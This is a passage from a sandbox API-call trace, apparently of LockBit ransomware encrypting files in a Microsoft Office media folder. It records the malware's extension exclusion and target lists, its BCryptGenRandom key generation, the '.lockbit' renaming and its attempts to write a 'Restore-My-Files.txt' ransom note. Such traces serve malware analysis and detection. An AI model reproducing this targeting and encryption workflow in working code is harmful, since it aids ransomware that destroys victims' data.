lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0202.914] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0202.914] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0202.914] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0202.914] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0202.914] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0202.914] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0202.914] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0202.914] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10254_.GIF") returned 1 [0202.914] lstrcmpiW (lpString1="ntldr", lpString2="BD10254_.GIF") returned 1 [0202.914] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10254_.GIF") returned 1 [0202.914] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10254_.GIF") returned 1 [0202.914] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10254_.GIF") returned -1 [0202.914] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10254_.GIF") returned 1 [0202.914] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10254_.GIF") returned 1 [0202.914] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0202.914] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10254_.GIF") returned=".GIF" [0202.914] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0202.914] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0202.914] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0202.914] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0202.914] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0202.914] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0202.914] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0202.915] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0202.915] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0202.915] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0202.915] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0202.915] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0202.915] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0202.915] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0202.915] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0202.915] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0202.915] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0202.915] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0202.915] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0202.915] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0202.915] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0202.915] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0202.915] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0202.915] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0202.915] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0202.915] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0202.915] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0202.915] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0202.915] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10254_.GIF.lockbit") returned 78 [0202.915] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10254_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10254_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0202.917] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0202.917] malloc (_Size=0x40068) returned 0x3df0008 [0202.917] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=240) returned 1 [0202.917] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.918] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0202.918] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.918] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0202.918] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0202.922] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10254_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10254_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.922] malloc (_Size=0xb2) returned 0x1fa2ed8 [0202.922] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0202.922] free (_Block=0x1fa2ed8) [0202.922] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10254_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0202.922] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0202.922] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0202.922] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f1d6100, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbc847960, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5f1d6100, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xea, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10255_.GIF", cAlternateFileName="")) returned 1 [0202.922] lstrcmpiW (lpString1=".", lpString2="BD10255_.GIF") returned -1 [0202.922] lstrcmpiW (lpString1="..", lpString2="BD10255_.GIF") returned -1 [0202.922] PathFindExtensionW (pszPath="BD10255_.GIF") returned=".GIF" [0202.922] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0202.922] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0202.922] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0202.922] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0202.922] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0202.922] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0202.922] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0202.922] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0202.922] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0202.922] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0202.922] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0202.922] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0202.922] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0202.922] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0202.922] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0202.922] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0202.922] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0202.922] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0202.923] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0202.923] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0202.923] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0202.923] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0202.923] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0202.923] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10255_.GIF") returned 1 [0202.923] lstrcmpiW (lpString1="ntldr", lpString2="BD10255_.GIF") returned 1 [0202.923] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10255_.GIF") returned 1 [0202.923] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10255_.GIF") returned 1 [0202.923] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10255_.GIF") returned -1 [0202.924] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10255_.GIF") returned 1 [0202.924] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10255_.GIF") returned 1 [0202.924] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0202.924] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10255_.GIF") returned=".GIF" [0202.924] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0202.924] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0202.924] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0202.924] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0202.924] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0202.924] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0202.924] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0202.924] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0202.924] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0202.924] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0202.924] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0202.924] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0202.924] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0202.924] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0202.924] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0202.924] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0202.924] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0202.924] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0202.924] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0202.924] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0202.924] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0202.924] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0202.924] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0202.924] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0202.924] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0202.924] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0202.924] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0202.924] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0202.924] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10255_.GIF.lockbit") returned 78 [0202.924] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10255_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10255_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0202.926] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0202.926] malloc (_Size=0x40068) returned 0x3df0008 [0202.926] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=234) returned 1 [0202.926] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.926] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0202.927] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.927] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0202.927] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0202.931] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10255_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10255_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.931] malloc (_Size=0xb2) returned 0x1fa2ed8 [0202.931] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0202.931] free (_Block=0x1fa2ed8) [0202.931] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10255_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0202.931] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0202.931] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0202.932] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe10b8b00, ftCreationTime.dwHighDateTime=0x1bd8f8e, ftLastAccessTime.dwLowDateTime=0xbc86dac0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe10b8b00, ftLastWriteTime.dwHighDateTime=0x1bd8f8e, nFileSizeHigh=0x0, nFileSizeLow=0x297, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10263_.GIF", cAlternateFileName="")) returned 1 [0202.932] lstrcmpiW (lpString1=".", lpString2="BD10263_.GIF") returned -1 [0202.932] lstrcmpiW (lpString1="..", lpString2="BD10263_.GIF") returned -1 [0202.932] PathFindExtensionW (pszPath="BD10263_.GIF") returned=".GIF" [0202.932] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0202.932] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0202.932] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0202.932] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0202.932] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0202.932] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0202.932] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0202.932] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0202.932] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0202.932] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0202.932] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0202.932] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0202.932] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0202.932] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0202.932] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0202.932] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0202.932] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0202.932] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0202.932] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0202.932] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0202.932] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0202.932] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0202.932] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0202.932] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0202.932] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0202.932] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0202.932] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0202.932] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0202.933] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0202.933] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0202.933] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0202.933] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0202.933] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0202.933] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0202.933] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0202.933] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0202.933] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0202.933] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0202.933] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0202.933] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0202.933] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0202.933] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0202.933] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0202.933] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0202.933] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0202.933] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0202.933] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0202.933] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10263_.GIF") returned 1 [0202.933] lstrcmpiW (lpString1="ntldr", lpString2="BD10263_.GIF") returned 1 [0202.933] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10263_.GIF") returned 1 [0202.933] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10263_.GIF") returned 1 [0202.933] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10263_.GIF") returned -1 [0202.933] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10263_.GIF") returned 1 [0202.933] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10263_.GIF") returned 1 [0202.934] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0202.934] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10263_.GIF") returned=".GIF" [0202.934] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0202.934] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0202.934] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0202.934] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0202.934] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0202.934] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0202.934] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0202.934] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0202.934] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0202.934] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0202.934] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0202.934] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0202.934] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0202.934] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0202.934] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0202.934] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0202.934] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0202.934] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0202.934] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0202.934] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0202.934] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0202.934] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0202.934] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0202.934] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0202.935] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0202.935] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0202.935] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0202.935] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0202.935] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10263_.GIF.lockbit") returned 78 [0202.935] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10263_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10263_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0202.937] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0202.937] malloc (_Size=0x40068) returned 0x3df0008 [0202.937] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=663) returned 1 [0202.937] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.938] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0202.938] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.938] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0202.938] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0202.942] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10263_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10263_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.942] malloc (_Size=0xb2) returned 0x1fa2ed8 [0202.942] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0202.942] free (_Block=0x1fa2ed8) [0202.942] PathRemoveFileSpecW (in: 